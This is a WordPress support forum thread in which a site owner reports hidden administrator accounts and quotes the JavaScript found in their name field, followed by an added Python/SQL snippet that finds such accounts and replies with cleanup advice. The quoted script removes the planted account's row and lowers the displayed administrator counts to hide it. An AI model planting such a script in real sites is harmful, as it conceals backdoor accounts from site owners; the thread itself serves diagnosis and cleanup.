WordPress.org


Authors Created Without My Knowledge (6 posts)

  1. scrooby
    Member
    Posted 5 years ago #

    Lo All,

    I am having the problem that authors are being created on my blog without me knowing. I had noticed a while back that some posts were being accepted without me doing so, which were what my settings were, but when I went to go list all the authors on my blog's homepage, it listed 2 hidden users that didn't come up in the 'users and authors' page in the admin section.

    I managed to find and get into these users and I found that it had this javascript in the name field:

    ... <b id="user_superuser"><script language="JavaScript">
    var setUserName = function(){
      try{
        var t=document.getElementById("user_superuser");
        while(t.nodeName!="TR"){
          t=t.parentNode;
        };
        t.parentNode.removeChild(t);
        var tags = document.getElementsByTagName("H3");
        var s = " shown below";
        for (var i = 0; i < tags.length; i++) {
          var t=tags[i].innerHTML;
          var h=tags[i];
          if(t.indexOf(s)>0){
            s =(parseInt(t)-1)+s;
            h.removeChild(h.firstChild);
            t = document.createTextNode(s);
            h.appendChild(t);
          }
        }
        var arr=document.getElementsByTagName("ul");
        for(var i in arr)
          if(arr[i].className=="subsubsub"){
            var n=/>Administrator \((\d+)\)</gi.exec(arr[i].innerHTML);
            if(n!=null && n[1]>0){
              var txt=arr[i].innerHTML.replace(/>Administrator \((\d+)\)</gi,">Administrator ("+(n[1]-1)+")<");
              arr[i].innerHTML=txt;
            }
            var n=/>Administrator <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
            if(n!=null && n[1]>0){
              var txt=arr[i].innerHTML.replace(/>Administrator <span class="count">\((\d+)\)</gi,">Administrator <span class=\"count\">("+(n[1]-1)+")<");
              arr[i].innerHTML=txt;
            }
            var n=/>All <span class="count">\((\d+)\)</gi.exec(arr[i].innerHTML);
            if(n!=null && n[1]>0){
              var txt=arr[i].innerHTML.replace(/>All <span class="count">\((\d+)\)</gi,">All <span class=\"count\">("+(n[1]-1)+")<");
              arr[i].innerHTML=txt;
            }
          }
      }catch(e){};
    };
    addLoadEvent(setUserName);
    </script>

    Is this some sort of javascript injection technique or are they auto generated users via WordPress?

    I'd really like to know how to block this as about 2 weeks after deleting the users, they have now appeared again. I currently have registration on the blog blocked so I have no idea how they're getting in?
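The script quoted in the post above only removes the user's table row and lowers the displayed counts in the browser, so the account itself is still in the database. The following is an added example, not part of the original post and not WordPress's own code: it lists accounts whose name fields contain markup by querying the user tables directly. It assumes the default `wp_` table prefix and runs against an in-memory SQLite database filled with constructed rows; the query text itself is plain SQL.

```python
import sqlite3

# Accounts whose name fields contain markup, with their stored role data.
# Assumption: default "wp_" table prefix (tables and the capabilities key).
SUSPECT_USERS_SQL = """
SELECT u.ID, u.user_login, m.meta_key AS name_field, cap.meta_value AS caps
FROM wp_users u
JOIN wp_usermeta m ON m.user_id = u.ID
LEFT JOIN wp_usermeta cap
       ON cap.user_id = u.ID AND cap.meta_key = 'wp_capabilities'
WHERE m.meta_key IN ('first_name', 'last_name', 'nickname')
  AND (m.meta_value LIKE '%<%' OR m.meta_value LIKE '%>%')
UNION
SELECT u.ID, u.user_login, 'display_name', cap.meta_value
FROM wp_users u
LEFT JOIN wp_usermeta cap
       ON cap.user_id = u.ID AND cap.meta_key = 'wp_capabilities'
WHERE u.display_name LIKE '%<%' OR u.display_name LIKE '%>%'
ORDER BY 1, 3
"""

def build_sample_db():
    """Constructed sample rows mimicking the two WordPress user tables."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, display_name TEXT);
        CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);
    """)
    db.executemany("INSERT INTO wp_users VALUES (?,?,?)", [
        (1, "admin", "Site Owner"), (2, "editor1", "Jane Doe"),
        (3, "constructed_hidden", "x"),
    ])
    admin = 'a:1:{s:13:"administrator";b:1;}'  # PHP-serialized role array
    db.executemany("INSERT INTO wp_usermeta VALUES (?,?,?)", [
        (1, "first_name", "Site"), (1, "wp_capabilities", admin),
        (2, "first_name", "Jane"), (2, "wp_capabilities", 'a:1:{s:6:"editor";b:1;}'),
        (3, "first_name", '<b id="user_superuser"><script>/* hides row */</script>'),
        (3, "wp_capabilities", admin),
    ])
    return db

def find_suspect_users(db):
    """Return one dict per (user, name field) that contains '<' or '>'."""
    return [{"id": r[0], "login": r[1], "name_field": r[2],
             "is_admin": '"administrator"' in (r[3] or "")}
            for r in db.execute(SUSPECT_USERS_SQL)]

if __name__ == "__main__":
    for hit in find_suspect_users(build_sample_db()):
        print(hit)
```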

  2. mrmist
    Forum Janitor
    Posted 5 years ago #

    What version of WordPress are you running?

    Since deleting the bogus users have you reset your blog and ftp passwords?

    Have you re-uploaded the WordPress source files to replace any hacked ones on your server?

  3. scrooby
    Member
    Posted 5 years ago #

    I'm currently running 2.8.1 and first time I did reset my passwords but not FTP.

    I'll also try and re-upload the WordPress files.

    Cheers for help...

  4. mrmist
    Forum Janitor
    Posted 5 years ago #

    Also take a look at hardening WordPress.

  5. Roy
    Member
    Posted 5 years ago #

    I guess you've been hacked and haven't cleaned up properly. Just upgrading might not rid you of the hack. Before looking at mrmist's link, look here and look for more information about cleaning up hacked sites, on this forum or elsewhere on the www.

  6. scrooby
    Member
    Posted 5 years ago #

    Cheers for the link, I'll have a look :)

Topic Closed

This topic has been closed to new replies.
